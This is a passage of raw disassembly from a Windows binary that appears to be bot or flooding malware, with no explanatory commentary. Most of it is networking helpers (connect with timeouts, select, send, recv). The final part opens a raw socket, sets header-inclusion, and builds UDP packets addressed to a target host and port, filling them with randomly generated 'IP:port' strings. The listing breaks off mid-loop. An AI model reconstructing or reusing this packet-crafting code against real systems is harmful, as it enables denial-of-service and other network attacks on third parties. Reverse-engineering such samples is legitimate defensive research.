jmp short loc_404F1E
; ---------------------------------------------------------------------------
loc_404F1A: ; CODE XREF: sub_404E1C+ED�j
; sub_404E1C+F3�j
and [ebp+var_18], 0
loc_404F1E: ; CODE XREF: sub_404E1C+FC�j
mov eax, [ebp+var_18]
pop esi
leave
retn
sub_404E1C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404F24 proc near ; CODE XREF: .text:0041390C�p
; .text:0041451D�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_0]
mov eax, [eax+8]
mov [ebp+var_4], eax
jmp short loc_404F3A
; ---------------------------------------------------------------------------
loc_404F33: ; CODE XREF: sub_404F24:loc_404F77�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_404F3A: ; CODE XREF: sub_404F24+D�j
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_4]
cmp ecx, [eax+4]
jnb short loc_404F79
mov eax, [ebp+arg_0]
add eax, 80Ch
push eax
mov eax, [ebp+var_4]
mov ecx, [ebp+arg_0]
push dword ptr [ecx+eax*4+0Ch]
call sub_416E30 ; __WSAFDIsSet
test eax, eax
jz short loc_404F77
mov eax, [ebp+var_4]
inc eax
mov ecx, [ebp+arg_0]
mov [ecx+8], eax
mov eax, [ebp+var_4]
mov ecx, [ebp+arg_0]
mov eax, [ecx+eax*4+0Ch]
jmp short locret_404F7B
; ---------------------------------------------------------------------------
loc_404F77: ; CODE XREF: sub_404F24+3B�j
jmp short loc_404F33
; ---------------------------------------------------------------------------
loc_404F79: ; CODE XREF: sub_404F24+1F�j
xor eax, eax
locret_404F7B: ; CODE XREF: sub_404F24+51�j
leave
retn
sub_404F24 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404F7D proc near ; CODE XREF: sub_404FD0+6�p
; .text:00413A38�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
jmp short loc_404F8E
; ---------------------------------------------------------------------------
loc_404F87: ; CODE XREF: sub_404F7D+37�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_404F8E: ; CODE XREF: sub_404F7D+8�j
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_4]
cmp ecx, [eax+4]
jnb short loc_404FB6
mov eax, [ebp+var_4]
mov ecx, [ebp+arg_0]
push dword ptr [ecx+eax*4+0Ch]
call sub_4053B1
pop ecx
mov eax, [ebp+var_4]
mov ecx, [ebp+arg_0]
and dword ptr [ecx+eax*4+0Ch], 0
jmp short loc_404F87
; ---------------------------------------------------------------------------
loc_404FB6: ; CODE XREF: sub_404F7D+1A�j
mov eax, [ebp+arg_0]
and dword ptr [eax+4], 0
mov eax, [ebp+arg_0]
and dword ptr [eax+8], 0
mov eax, [ebp+arg_0]
and dword ptr [eax+80Ch], 0
leave
retn
sub_404F7D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404FD0 proc near ; CODE XREF: .text:00413A97�p
; .text:004145E8�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push [ebp+arg_0]
call sub_404F7D
pop ecx
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
pop ebp
retn
sub_404FD0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404FE7 proc near ; CODE XREF: sub_412BC9+11�p
; .text:004138AA�p ...
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = byte ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 2Ch
push 20h
push 0
lea eax, [ebp+var_24]
push eax
call sub_416B6A ; memset
add esp, 0Ch
mov eax, [ebp+arg_8]
and eax, 2
test eax, eax
jz short loc_405010
mov [ebp+var_20], 17h
jmp short loc_405027
; ---------------------------------------------------------------------------
loc_405010: ; CODE XREF: sub_404FE7+1E�j
mov eax, [ebp+arg_8]
and eax, 1
test eax, eax
jz short loc_405023
mov [ebp+var_20], 2
jmp short loc_405027
; ---------------------------------------------------------------------------
loc_405023: ; CODE XREF: sub_404FE7+31�j
and [ebp+var_20], 0
loc_405027: ; CODE XREF: sub_404FE7+27�j
; sub_404FE7+3A�j
mov eax, [ebp+arg_8]
and eax, 4
xor ecx, ecx
test eax, eax
setnz cl
inc ecx
mov [ebp+var_1C], ecx
lea eax, [ebp+var_28]
push eax
lea eax, [ebp+var_24]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call dword_41DE84 ; getaddrinfo
test eax, eax
jz short loc_405057
xor eax, eax
jmp locret_4050E8
; ---------------------------------------------------------------------------
loc_405057: ; CODE XREF: sub_404FE7+67�j
mov eax, [ebp+var_28]
mov [ebp+var_4], eax
jmp short loc_405068
; ---------------------------------------------------------------------------
loc_40505F: ; CODE XREF: sub_404FE7+A8�j
; sub_404FE7+F4�j
mov eax, [ebp+var_4]
mov eax, [eax+1Ch]
mov [ebp+var_4], eax
loc_405068: ; CODE XREF: sub_404FE7+76�j
cmp [ebp+var_4], 0
jz short loc_4050DD
mov eax, [ebp+var_4]
push dword ptr [eax+0Ch]
mov eax, [ebp+var_4]
push dword ptr [eax+8]
mov eax, [ebp+var_4]
push dword ptr [eax+4]
call ds:dword_417218 ; socket
mov [ebp+var_2C], eax
cmp [ebp+var_2C], 0FFFFFFFFh
jnz short loc_405091
jmp short loc_40505F
; ---------------------------------------------------------------------------
loc_405091: ; CODE XREF: sub_404FE7+A6�j
push 0
push [ebp+var_2C]
call sub_404457
pop ecx
pop ecx
mov eax, [ebp+var_4]
push dword ptr [eax+10h]
mov eax, [ebp+var_4]
push dword ptr [eax+18h]
push [ebp+var_2C]
call ds:dword_4171F4 ; connect
cmp eax, 0FFFFFFFFh
jnz short loc_4050D2
call ds:dword_417224 ; WSAGetLastError
cmp eax, 2733h
jnz short loc_4050D2
push [ebp+var_28]
call dword_41DE8C ; freeaddrinfo
mov eax, [ebp+var_2C]
jmp short locret_4050E8
; ---------------------------------------------------------------------------
loc_4050D2: ; CODE XREF: sub_404FE7+CE�j
; sub_404FE7+DB�j
push [ebp+var_2C]
call sub_4053B1
pop ecx
jmp short loc_40505F
; ---------------------------------------------------------------------------
loc_4050DD: ; CODE XREF: sub_404FE7+85�j
push [ebp+var_28]
call dword_41DE8C ; freeaddrinfo
xor eax, eax
locret_4050E8: ; CODE XREF: sub_404FE7+6B�j
; sub_404FE7+E9�j
leave
retn
sub_404FE7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4050EA proc near ; CODE XREF: .text:00401EB8�p
; sub_402698+16�p ...
var_844 = dword ptr -844h
var_840 = dword ptr -840h
var_83C = dword ptr -83Ch
var_838 = dword ptr -838h
var_834 = dword ptr -834h
var_830 = dword ptr -830h
var_82C = dword ptr -82Ch
var_828 = dword ptr -828h
var_824 = dword ptr -824h
var_820 = dword ptr -820h
var_24 = byte ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 844h
mov eax, [ebp+arg_C]
cdq
mov ecx, 3E8h
idiv ecx
mov [ebp+var_834], eax
mov eax, [ebp+arg_C]
cdq
mov ecx, 3E8h
idiv ecx
imul edx, 3E8h
mov [ebp+var_830], edx
push 20h
push 0
lea eax, [ebp+var_24]
push eax
call sub_416B6A ; memset
add esp, 0Ch
mov eax, [ebp+arg_8]
and eax, 2
test eax, eax
jz short loc_40513E
mov [ebp+var_20], 17h
jmp short loc_405155
; ---------------------------------------------------------------------------
loc_40513E: ; CODE XREF: sub_4050EA+49�j
mov eax, [ebp+arg_8]
and eax, 1
test eax, eax
jz short loc_405151
mov [ebp+var_20], 2
jmp short loc_405155
; ---------------------------------------------------------------------------
loc_405151: ; CODE XREF: sub_4050EA+5C�j
and [ebp+var_20], 0
loc_405155: ; CODE XREF: sub_4050EA+52�j
; sub_4050EA+65�j
mov eax, [ebp+arg_8]
and eax, 4
xor ecx, ecx
test eax, eax
setnz cl
inc ecx
mov [ebp+var_1C], ecx
lea eax, [ebp+var_82C]
push eax
lea eax, [ebp+var_24]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call dword_41DE84 ; getaddrinfo
test eax, eax
jz short loc_405188
xor eax, eax
jmp locret_40538B
; ---------------------------------------------------------------------------
loc_405188: ; CODE XREF: sub_4050EA+95�j
mov eax, [ebp+var_82C]
mov [ebp+var_4], eax
jmp short loc_40519C
; ---------------------------------------------------------------------------
loc_405193: ; CODE XREF: sub_4050EA+E3�j
; sub_4050EA+128�j ...
mov eax, [ebp+var_4]
mov eax, [eax+1Ch]
mov [ebp+var_4], eax
loc_40519C: ; CODE XREF: sub_4050EA+A7�j
cmp [ebp+var_4], 0
jz loc_40537D
mov eax, [ebp+var_4]
push dword ptr [eax+0Ch]
mov eax, [ebp+var_4]
push dword ptr [eax+8]
mov eax, [ebp+var_4]
push dword ptr [eax+4]
call ds:dword_417218 ; socket
mov [ebp+var_83C], eax
cmp [ebp+var_83C], 0FFFFFFFFh
jnz short loc_4051CF
jmp short loc_405193
; ---------------------------------------------------------------------------
loc_4051CF: ; CODE XREF: sub_4050EA+E1�j
push 0
push [ebp+var_83C]
call sub_404457
pop ecx
pop ecx
mov eax, [ebp+var_4]
push dword ptr [eax+10h]
mov eax, [ebp+var_4]
push dword ptr [eax+18h]
push [ebp+var_83C]
call ds:dword_4171F4 ; connect
mov [ebp+var_838], eax
cmp [ebp+var_838], 0
jz short loc_405217
call ds:dword_417224 ; WSAGetLastError
cmp eax, 2733h
jz short loc_405217
jmp loc_405193
; ---------------------------------------------------------------------------
loc_405217: ; CODE XREF: sub_4050EA+119�j
; sub_4050EA+126�j
and [ebp+var_828], 0
loc_40521E: ; CODE XREF: sub_4050EA+1AF�j
and [ebp+var_840], 0
jmp short loc_405234
; ---------------------------------------------------------------------------
loc_405227: ; CODE XREF: sub_4050EA:loc_405259�j
mov eax, [ebp+var_840]
inc eax
mov [ebp+var_840], eax
loc_405234: ; CODE XREF: sub_4050EA+13B�j
mov eax, [ebp+var_840]
cmp eax, [ebp+var_828]
jnb short loc_40525B
mov eax, [ebp+var_840]
mov eax, [ebp+eax*4+var_824]
cmp eax, [ebp+var_83C]
jnz short loc_405259
jmp short loc_40525B
; ---------------------------------------------------------------------------
loc_405259: ; CODE XREF: sub_4050EA+16B�j
jmp short loc_405227
; ---------------------------------------------------------------------------
loc_40525B: ; CODE XREF: sub_4050EA+156�j
; sub_4050EA+16D�j
mov eax, [ebp+var_840]
cmp eax, [ebp+var_828]
jnz short loc_405295
cmp [ebp+var_828], 200h
jnb short loc_405295
mov eax, [ebp+var_840]
mov ecx, [ebp+var_83C]
mov [ebp+eax*4+var_824], ecx
mov eax, [ebp+var_828]
inc eax
mov [ebp+var_828], eax
loc_405295: ; CODE XREF: sub_4050EA+17D�j
; sub_4050EA+189�j
xor eax, eax
test eax, eax
jnz short loc_40521E
lea eax, [ebp+var_834]
push eax
push 0
lea eax, [ebp+var_828]
push eax
push 0
push 0
call ds:dword_41722C ; select
cmp eax, 1
jnz short loc_4052E0
push 1
push [ebp+var_83C]
call sub_404457
pop ecx
pop ecx
push [ebp+var_82C]
call dword_41DE8C ; freeaddrinfo
mov eax, [ebp+var_83C]
jmp locret_40538B
; ---------------------------------------------------------------------------
loc_4052E0: ; CODE XREF: sub_4050EA+1CE�j
; sub_4050EA+27C�j
and [ebp+var_844], 0
jmp short loc_4052F6
; ---------------------------------------------------------------------------
loc_4052E9: ; CODE XREF: sub_4050EA:loc_405360�j
mov eax, [ebp+var_844]
inc eax
mov [ebp+var_844], eax
loc_4052F6: ; CODE XREF: sub_4050EA+1FD�j
mov eax, [ebp+var_844]
cmp eax, [ebp+var_828]
jnb short loc_405362
mov eax, [ebp+var_844]
mov eax, [ebp+eax*4+var_824]
cmp eax, [ebp+var_83C]
jnz short loc_405360
loc_405319: ; CODE XREF: sub_4050EA+265�j
mov eax, [ebp+var_828]
dec eax
cmp [ebp+var_844], eax
jnb short loc_405351
mov eax, [ebp+var_844]
mov ecx, [ebp+var_844]
mov ecx, [ebp+ecx*4+var_820]
mov [ebp+eax*4+var_824], ecx
mov eax, [ebp+var_844]
inc eax
mov [ebp+var_844], eax
jmp short loc_405319
; ---------------------------------------------------------------------------
loc_405351: ; CODE XREF: sub_4050EA+23C�j
mov eax, [ebp+var_828]
dec eax
mov [ebp+var_828], eax
jmp short loc_405362
; ---------------------------------------------------------------------------
loc_405360: ; CODE XREF: sub_4050EA+22D�j
jmp short loc_4052E9
; ---------------------------------------------------------------------------
loc_405362: ; CODE XREF: sub_4050EA+218�j
; sub_4050EA+274�j
xor eax, eax
test eax, eax
jnz loc_4052E0
push [ebp+var_83C]
call sub_4053B1
pop ecx
jmp loc_405193
; ---------------------------------------------------------------------------
loc_40537D: ; CODE XREF: sub_4050EA+B6�j
push [ebp+var_82C]
call dword_41DE8C ; freeaddrinfo
xor eax, eax
locret_40538B: ; CODE XREF: sub_4050EA+99�j
; sub_4050EA+1F1�j
leave
retn
sub_4050EA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40538D proc near ; CODE XREF: .text:004020A6�p
; .text:004024BD�p ...
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 1
push [ebp+arg_0]
call ds:dword_417200 ; shutdown
push 3E8h
call ds:dword_41709C ; Sleep
push [ebp+arg_0]
call sub_4053B1
pop ecx
pop ebp
retn
sub_40538D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4053B1 proc near ; CODE XREF: sub_404279+77�p
; sub_40432E+1C�p ...
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push [ebp+arg_0]
call ds:dword_417230 ; closesocket
pop ebp
retn
sub_4053B1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4053BF proc near ; CODE XREF: .text:00401F94�p
; .text:004023BB�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push 0
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_41720C ; send
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
leave
retn
sub_4053BF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4053DC proc near ; CODE XREF: .text:00403EC4�p
; sub_405443+21�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
cmp [ebp+arg_8], 2
jnb short loc_4053F6
push 271Eh
call ds:dword_417234 ; WSASetLastError
or eax, 0FFFFFFFFh
jmp short locret_405441
; ---------------------------------------------------------------------------
loc_4053F6: ; CODE XREF: sub_4053DC+8�j
push 0
mov eax, [ebp+arg_8]
dec eax
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_417248 ; recv
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jz short loc_405418
cmp [ebp+var_4], 0FFFFFFFFh
jnz short loc_40541D
loc_405418: ; CODE XREF: sub_4053DC+34�j
mov eax, [ebp+var_4]
jmp short locret_405441
; ---------------------------------------------------------------------------
loc_40541D: ; CODE XREF: sub_4053DC+3A�j
mov eax, [ebp+var_4]
cmp eax, [ebp+arg_8]
jb short loc_405435
push 271Eh
call ds:dword_417234 ; WSASetLastError
or eax, 0FFFFFFFFh
jmp short locret_405441
; ---------------------------------------------------------------------------
loc_405435: ; CODE XREF: sub_4053DC+47�j
mov eax, [ebp+arg_4]
add eax, [ebp+var_4]
and byte ptr [eax], 0
mov eax, [ebp+var_4]
locret_405441: ; CODE XREF: sub_4053DC+18�j
; sub_4053DC+3F�j ...
leave
retn
sub_4053DC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405443 proc near ; CODE XREF: sub_402698+8D�p
; sub_402698+2BE�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push [ebp+arg_C]
push [ebp+arg_0]
call sub_40546E
pop ecx
pop ecx
test eax, eax
jnz short loc_40545B
xor eax, eax
jmp short loc_40546C
; ---------------------------------------------------------------------------
loc_40545B: ; CODE XREF: sub_405443+12�j
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4053DC
add esp, 0Ch
loc_40546C: ; CODE XREF: sub_405443+16�j
pop ebp
retn
sub_405443 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40546E proc near ; CODE XREF: sub_405443+9�p
; .text:00410676�p ...
var_1018 = dword ptr -1018h
var_1014 = dword ptr -1014h
var_1010 = dword ptr -1010h
var_100C = dword ptr -100Ch
var_1008 = dword ptr -1008h
var_1004 = dword ptr -1004h
var_804 = dword ptr -804h
var_800 = dword ptr -800h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, 1018h
call sub_416BC0
and [ebp+var_804], 0
and [ebp+var_1008], 0
loc_405489: ; CODE XREF: sub_40546E+90�j
and [ebp+var_1014], 0
jmp short loc_40549F
; ---------------------------------------------------------------------------
loc_405492: ; CODE XREF: sub_40546E:loc_4054C1�j
mov eax, [ebp+var_1014]
inc eax
mov [ebp+var_1014], eax
loc_40549F: ; CODE XREF: sub_40546E+22�j
mov eax, [ebp+var_1014]
cmp eax, [ebp+var_804]
jnb short loc_4054C3
mov eax, [ebp+var_1014]
mov eax, [ebp+eax*4+var_800]
cmp eax, [ebp+arg_0]
jnz short loc_4054C1
jmp short loc_4054C3
; ---------------------------------------------------------------------------
loc_4054C1: ; CODE XREF: sub_40546E+4F�j
jmp short loc_405492
; ---------------------------------------------------------------------------
loc_4054C3: ; CODE XREF: sub_40546E+3D�j
; sub_40546E+51�j
mov eax, [ebp+var_1014]
cmp eax, [ebp+var_804]
jnz short loc_4054FA
cmp [ebp+var_804], 200h
jnb short loc_4054FA
mov eax, [ebp+var_1014]
mov ecx, [ebp+arg_0]
mov [ebp+eax*4+var_800], ecx
mov eax, [ebp+var_804]
inc eax
mov [ebp+var_804], eax
loc_4054FA: ; CODE XREF: sub_40546E+61�j
; sub_40546E+6D�j
xor eax, eax
test eax, eax
jnz short loc_405489
loc_405500: ; CODE XREF: sub_40546E+107�j
and [ebp+var_1018], 0
jmp short loc_405516
; ---------------------------------------------------------------------------
loc_405509: ; CODE XREF: sub_40546E:loc_405538�j
mov eax, [ebp+var_1018]
inc eax
mov [ebp+var_1018], eax
loc_405516: ; CODE XREF: sub_40546E+99�j
mov eax, [ebp+var_1018]
cmp eax, [ebp+var_1008]
jnb short loc_40553A
mov eax, [ebp+var_1018]
mov eax, [ebp+eax*4+var_1004]
cmp eax, [ebp+arg_0]
jnz short loc_405538
jmp short loc_40553A
; ---------------------------------------------------------------------------
loc_405538: ; CODE XREF: sub_40546E+C6�j
jmp short loc_405509
; ---------------------------------------------------------------------------
loc_40553A: ; CODE XREF: sub_40546E+B4�j
; sub_40546E+C8�j
mov eax, [ebp+var_1018]
cmp eax, [ebp+var_1008]
jnz short loc_405571
cmp [ebp+var_1008], 200h
jnb short loc_405571
mov eax, [ebp+var_1018]
mov ecx, [ebp+arg_0]
mov [ebp+eax*4+var_1004], ecx
mov eax, [ebp+var_1008]
inc eax
mov [ebp+var_1008], eax
loc_405571: ; CODE XREF: sub_40546E+D8�j
; sub_40546E+E4�j
xor eax, eax
test eax, eax
jnz short loc_405500
mov eax, [ebp+arg_4]
xor edx, edx
mov ecx, 3E8h
div ecx
mov [ebp+var_1010], eax
mov eax, [ebp+arg_4]
xor edx, edx
mov ecx, 3E8h
div ecx
imul edx, 3E8h
mov [ebp+var_100C], edx
lea eax, [ebp+var_1010]
push eax
lea eax, [ebp+var_1008]
push eax
push 0
lea eax, [ebp+var_804]
push eax
push 1
call ds:dword_41722C ; select
cmp eax, 1
jz short loc_4055C9
xor eax, eax
jmp short locret_4055E3
; ---------------------------------------------------------------------------
loc_4055C9: ; CODE XREF: sub_40546E+155�j
lea eax, [ebp+var_804]
push eax
push [ebp+arg_0]
call sub_416E30 ; __WSAFDIsSet
test eax, eax
jz short loc_4055E1
push 1
pop eax
jmp short locret_4055E3
; ---------------------------------------------------------------------------
loc_4055E1: ; CODE XREF: sub_40546E+16C�j
xor eax, eax
locret_4055E3: ; CODE XREF: sub_40546E+159�j
; sub_40546E+171�j
leave
retn
sub_40546E endp
; ---------------------------------------------------------------------------
loc_4055E5: ; DATA XREF: sub_405E45+113�o
push ebp
mov ebp, esp
mov eax, 1358h
call sub_416BC0
push 2B9h
push dword ptr [ebp+8]
lea eax, [ebp-1334h]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push dword ptr [ebp+8]
call sub_416B4C ; free
pop ecx
push 0FFh
push 3
push 2
call ds:dword_417218 ; socket
mov [ebp-1078h], eax
cmp dword ptr [ebp-1078h], 0FFFFFFFFh
jnz short loc_405643
push dword ptr [ebp-1334h]
call sub_409763
pop ecx
xor eax, eax
jmp locret_405E41
; ---------------------------------------------------------------------------
loc_405643: ; CODE XREF: .text:0040562E�j
mov dword ptr [ebp-1340h], 1
push 4
lea eax, [ebp-1340h]
push eax
push 2
push 0
push dword ptr [ebp-1078h]
call ds:dword_417204 ; setsockopt
cmp eax, 0FFFFFFFFh
jnz short loc_40567E
push dword ptr [ebp-1334h]
call sub_409763
pop ecx
xor eax, eax
jmp locret_405E41
; ---------------------------------------------------------------------------
loc_40567E: ; CODE XREF: .text:00405669�j
push 0
push dword ptr [ebp-1078h]
call sub_404457
pop ecx
pop ecx
push 10h
push 0
lea eax, [ebp-10h]
push eax
call sub_416B6A ; memset
add esp, 0Ch
mov word ptr [ebp-10h], 2
lea eax, [ebp-108Dh]
push eax
call sub_416B9C ; atoi
pop ecx
push eax
call ds:dword_417238 ; htons
mov [ebp-0Eh], ax
lea eax, [ebp-118Dh]
push eax
call ds:dword_417244 ; inet_addr
mov [ebp-0Ch], eax
cmp dword ptr [ebp-0Ch], 0FFFFFFFFh
jnz short loc_405710
lea eax, [ebp-118Dh]
push eax
call ds:dword_41723C ; gethostbyname
mov [ebp-1344h], eax
cmp dword ptr [ebp-1344h], 0
jnz short loc_405700
push dword ptr [ebp-1334h]
call sub_409763
pop ecx
xor eax, eax
jmp locret_405E41
; ---------------------------------------------------------------------------
loc_405700: ; CODE XREF: .text:004056EB�j
mov eax, [ebp-1344h]
mov eax, [eax+0Ch]
mov eax, [eax]
mov eax, [eax]
mov [ebp-0Ch], eax
loc_405710: ; CODE XREF: .text:004056CF�j
cmp dword ptr [ebp-0Ch], 0FFFFFFFFh
jnz short loc_405729
push dword ptr [ebp-1334h]
call sub_409763
pop ecx
xor eax, eax
jmp locret_405E41
; ---------------------------------------------------------------------------
loc_405729: ; CODE XREF: .text:00405714�j
push 1060h
push 0
lea eax, [ebp-1074h]
push eax
call sub_416B6A ; memset
add esp, 0Ch
lea eax, [ebp-1074h]
mov [ebp-133Ch], eax
lea eax, [ebp-1058h]
mov [ebp-14h], eax
mov eax, [ebp-133Ch]
mov al, [eax]
and al, 0F0h
or al, 5
mov ecx, [ebp-133Ch]
mov [ecx], al
mov eax, [ebp-133Ch]
mov al, [eax]
and al, 0Fh
or al, 40h
mov ecx, [ebp-133Ch]
mov [ecx], al
mov eax, [ebp-133Ch]
mov byte ptr [eax+9], 11h
mov eax, [ebp-133Ch]
mov ecx, [ebp-0Ch]
mov [eax+10h], ecx
mov eax, [ebp-133Ch]
mov cx, [ebp-0Eh]
mov [eax+16h], cx
and dword ptr [ebp-1338h], 0
jmp short loc_4057B6
; ---------------------------------------------------------------------------
loc_4057A9: ; CODE XREF: .text:loc_405E22�j
mov eax, [ebp-1338h]
inc eax
mov [ebp-1338h], eax
loc_4057B6: ; CODE XREF: .text:004057A7�j
mov eax, [ebp-1338h]
cmp eax, [ebp-1087h]
jge loc_405E27
mov eax, [ebp-107Fh]
mov [ebp-1358h], eax
cmp dword ptr [ebp-1358h], 1
jz short loc_4057FC
cmp dword ptr [ebp-1358h], 2
jz loc_405924
cmp dword ptr [ebp-1358h], 3
jz loc_405A11
jmp loc_405C71
; ---------------------------------------------------------------------------
loc_4057FC: ; CODE XREF: .text:004057DB�j
push 0FFFFh
push 1
call sub_4103F5
pop ecx
pop ecx
movzx eax, ax
push eax
push offset aU ; "%u\r\n"
push dword ptr [ebp-14h]
call sub_416B5E ; sprintf
add esp, 0Ch
loc_40581E: ; CODE XREF: .text:004058A4�j
push dword ptr [ebp-14h]
call sub_416B40 ; strlen
pop ecx
cmp eax, 7D0h
jnb short loc_4058A9
push 0FFFFh
push 1
call sub_4103F5
pop ecx
pop ecx
movzx eax, ax
push eax
push 0FFh
push 1
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push 0FFh
push 1
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push 0FFh
push 1
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push 0FFh
push 1
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push offset aU_U_U_UU ; "%u.%u.%u.%u:%u\r\n"
push dword ptr [ebp-14h]
call sub_416B40 ; strlen
pop ecx
mov ecx, [ebp-14h]
add ecx, eax
push ecx
call sub_416B5E ; sprintf
add esp, 1Ch
jmp loc_40581E
; ---------------------------------------------------------------------------
loc_4058A9: ; CODE XREF: .text:0040582C�j
push 0FFFFh
push 1
call sub_4103F5
pop ecx
pop ecx
movzx eax, ax
push eax
push 0FFh
push 1
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push 0FFh
push 1
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push 0FFh
push 1
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push 0FFh
push 1
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push offset aU_U_U_UU_0 ; "%u.%u.%u.%u:%u"
push dword ptr [ebp-14h]
call sub_416B40 ; strlen
pop ecx
mov ecx, [ebp-14h]
add ecx, eax
push ecx
call sub_416B5E ; sprintf
add esp, 1Ch
jmp loc_405C93
; ---------------------------------------------------------------------------
loc_405924: ; CODE XREF: .text:004057E4�j
push 0FFFFh
push 1
call sub_4103F5
pop ecx
pop ecx
movzx eax, ax
push eax
push offset aU ; "%u\r\n"
push dword ptr [ebp-14h]
call sub_416B5E ; sprintf
add esp, 0Ch
loc_405946: ; CODE XREF: .text:004059B0�j
push dword ptr [ebp-14h]
call sub_416B40 ; strlen
pop ecx
cmp eax, 7D0h
jnb short loc_4059B2
push 1
push 0
call sub_4103F5
pop ecx
pop ecx
movzx eax, ax
push eax
push 1
push 0
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push 1
push 0
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push 1
push 0
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push 1
push offset aU_U_U_UU ; "%u.%u.%u.%u:%u\r\n"
push dword ptr [ebp-14h]
call sub_416B40 ; strlen
pop ecx
mov ecx, [ebp-14h]
add ecx, eax
push ecx
call sub_416B5E ; sprintf
add esp, 1Ch
jmp short loc_405946
; ---------------------------------------------------------------------------
loc_4059B2: ; CODE XREF: .text:00405954�j
push 1
push 0
call sub_4103F5
pop ecx
pop ecx
movzx eax, ax
push eax
push 1
push 0
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push 1
push 0
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push 1
push 0
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push 1
push offset aU_U_U_UU_0 ; "%u.%u.%u.%u:%u"
push dword ptr [ebp-14h]
call sub_416B40 ; strlen
pop ecx
mov ecx, [ebp-14h]
add ecx, eax
push ecx
call sub_416B5E ; sprintf
add esp, 1Ch
jmp loc_405C93
; ---------------------------------------------------------------------------
loc_405A11: ; CODE XREF: .text:004057F1�j
push 2
push 0
call sub_4103F5
pop ecx
pop ecx
mov [ebp-134Ch], eax
cmp dword ptr [ebp-134Ch], 0
jnz short loc_405A52
push 0FFFFh
push 1
call sub_4103F5
pop ecx
pop ecx
movzx eax, ax
push eax
push offset aU_0 ; "%u"
push dword ptr [ebp-14h]
call sub_416B5E ; sprintf
add esp, 0Ch
jmp loc_405C6F
; ---------------------------------------------------------------------------
loc_405A52: ; CODE XREF: .text:00405A29�j
cmp dword ptr [ebp-134Ch], 1
jnz loc_405B87
push 0FFFFh
push 1
call sub_4103F5
pop ecx
pop ecx
movzx eax, ax
push eax
push offset aU ; "%u\r\n"
push dword ptr [ebp-14h]
call sub_416B5E ; sprintf
add esp, 0Ch
loc_405A81: ; CODE XREF: .text:00405B07�j
push dword ptr [ebp-14h]
call sub_416B40 ; strlen
pop ecx
cmp eax, 7D0h
jnb short loc_405B0C
push 0FFFFh
push 1
call sub_4103F5
pop ecx
pop ecx
movzx eax, ax
push eax
push 0FFh
push 1
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push 0FFh
push 1
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push 0FFh
push 1
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push 0FFh
push 1
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push offset aU_U_U_UU ; "%u.%u.%u.%u:%u\r\n"
push dword ptr [ebp-14h]
